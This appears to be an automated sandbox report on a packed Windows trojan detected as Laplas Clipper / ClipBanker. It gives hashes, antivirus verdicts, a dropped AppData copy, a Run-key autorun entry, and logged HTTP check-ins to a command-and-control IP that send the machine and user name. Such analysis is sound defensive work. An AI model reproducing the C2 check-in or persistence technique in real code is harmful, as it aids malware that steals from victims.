Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 20, 2023, 9:40 a.m.	March 20, 2023, 9:42 a.m.

Size	7.3MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`99f16ab6ab670935b5aa5c84b1b5f6bd`
SHA256	`348014d89503967f134b988559b2ac694e0d3256708bbf7d8b96aa8c49fe1057`
CRC32	`093FFDE4`
ssdeep	`196608:Ltu5ODXM16mjmKSRFWuxx6ruj3nK/x9jWuy:L05ODcgR6mix1`
Yara	UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library OS_Processor_Check_Zero - OS Processor Check IsPE32 - (no description) PE_Header_Zero - PE File Signature Antivirus - Contains references to security software

neee.exe "C:\Users\test22\AppData\Local\Temp\neee.exe"
1188
- svcservice.exe "C:\Users\test22\AppData\Roaming\telemetry\svcservice.exe"
  2212

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.106.92.104	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49165 -> 185.106.92.104:80	2039776	ET MALWARE Laplas Clipper - SetOnline CnC Checkin	A Network Trojan was detected
TCP 192.168.56.103:49163 -> 185.106.92.104:80	2039776	ET MALWARE Laplas Clipper - SetOnline CnC Checkin	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA March 20, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameA March 20, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	.+S6
section	.a7p
section	.)>s

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 20, 2023, 9:40 a.m.	stacktrace: neee+0x5de5a1 @ 0x147e5a1 0x246 exception.instruction_r: 90 52 ba 44 49 ba 1f 9c 66 81 c2 0e 7a 0f 8c 42 exception.symbol: neee+0x57dcd5 exception.instruction: nop exception.module: neee.exe exception.exception_code: 0x80000004 exception.offset: 5758165 exception.address: 0x141dcd5 registers.esp: 3798064 registers.edi: 0 registers.eax: 697697054 registers.ebp: 3800088 registers.edx: 78 registers.ebx: 15335424 registers.esi: 0 registers.ecx: 1971191808	1	0	0
__exception__ March 20, 2023, 9:40 a.m.	stacktrace: svcservice+0x5de5a1 @ 0x162e5a1 0x246 exception.instruction_r: 90 52 ba 44 49 ba 1f 9c 66 81 c2 0e 7a 0f 8c 42 exception.symbol: svcservice+0x57dcd5 exception.instruction: nop exception.module: svcservice.exe exception.exception_code: 0x80000004 exception.offset: 5758165 exception.address: 0x15cdcd5 registers.esp: 1962784 registers.edi: 0 registers.eax: 3904488452 registers.ebp: 1964808 registers.edx: 85 registers.ebx: 17104896 registers.esi: 0 registers.ecx: 1971191808	1	0	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://185.106.92.104/bot/regex
suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://185.106.92.104/bot/online?guid=TEST22-PC\\test22&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

Performs some HTTP requests (2 events)

request	GET http://185.106.92.104/bot/regex
request	GET http://185.106.92.104/bot/online?guid=TEST22-PC\\test22&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

Allocates read-write-execute memory (usually to unpack itself) (16 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00800000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00810000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00820000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00830000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00840000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00850000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00860000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00870000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00940000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00950000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00960000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00970000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Foreign language identified in PE resource (1 event)

name

RT_VERSION

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00b79bdc

size

0x00000370

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\telemetry\svcservice.exe

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\telemetry\svcservice.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Roaming\telemetry\svcservice.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW March 20, 2023, 9:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\telemetry\svcservice.exe parameters: filepath: C:\Users\test22\AppData\Roaming\telemetry\svcservice.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory March 20, 2023, 9:40 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x00800000 process_handle: 0xffffffff	1	0	0

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x00704e00', u'virtual_address': u'0x00433000', u'entropy': 7.974800121436006, u'name': u'.)>s', u'virtual_size': u'0x00704de0'}

entropy

7.97480012144

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00041200', u'virtual_address': u'0x00b39000', u'entropy': 7.936965196259179, u'name': u'.rsrc', u'virtual_size': u'0x000410c9'}

entropy

7.93696519626

description

A section with a high entropy has been found

entropy

0.998927038627

description

Overall entropy of this PE file is high

Communicates with host for which no DNS query was performed (1 event)

host

185.106.92.104

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\telemetry

reg_value

C:\Users\test22\AppData\Roaming\telemetry\svcservice.exe

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (4 events)

Time & API	Arguments	Status	Return
HttpOpenRequestA March 20, 2023, 9:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396	1	13369356
HttpOpenRequestA March 20, 2023, 9:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396	1	13369356
HttpOpenRequestA March 20, 2023, 9:41 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396	1	13369356
HttpOpenRequestA March 20, 2023, 9:41 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396	1	13369356

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Bkav	W32.AIDetectNet.01
Lionic	Trojan.Win32.Agent.Y!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.65899324
CAT-QuickHeal	Trojan.ClipBanker
ALYac	Trojan.GenericKD.65899324
Cylance	unsafe
Zillya	Trojan.ClipBanker.Win32.15896
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	TrojanBanker:Win32/ClipBanker.4fa8d61e
K7GW	Trojan ( 0059d8cc1 )
K7AntiVirus	Trojan ( 0059d8cc1 )
Arcabit	Trojan.Generic.D3ED8B3C
BitDefenderTheta	Gen:NN.ZexaF.36344.@J0@aik!1ynj
Cyren	W32/ABRisk.MTJC-9255
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Packed.VMProtect.AHG
APEX	Malicious
Paloalto	generic.ml
Cynet	Malicious (score: 100)
Kaspersky	Trojan-Banker.Win32.ClipBanker.xlr
BitDefender	Trojan.GenericKD.65899324
Avast	Win32:TrojanX-gen [Trj]
Tencent	Malware.Win32.Gencirc.1188d309
Sophos	Generic ML PUA (PUA)
VIPRE	Trojan.GenericKD.65899324
McAfee-GW-Edition	BehavesLike.Win32.Generic.wc
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.99f16ab6ab670935
Emsisoft	Trojan.GenericKD.65899324 (B)
Avira	HEUR/AGEN.1254260
MAX	malware (ai score=82)
Antiy-AVL	Trojan[Packed]/Win32.VMProtect
Gridinsoft	Malware.Win32.Sabsik.cc
Microsoft	Trojan:Win32/Casdet!rfn
GData	Trojan.GenericKD.65899324
Google	Detected
AhnLab-V3	Trojan/Win.Generic.C5396243
McAfee	Artemis!99F16AB6AB67
Malwarebytes	Malware.Heuristic.1003
TrendMicro-HouseCall	TROJ_GEN.R002H0CCE23
Rising	Trojan.Agent!8.B1E (TFE:5:R9MN1BAHivH)
Fortinet	W32/PossibleThreat
AVG	Win32:TrojanX-gen [Trj]

neee.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All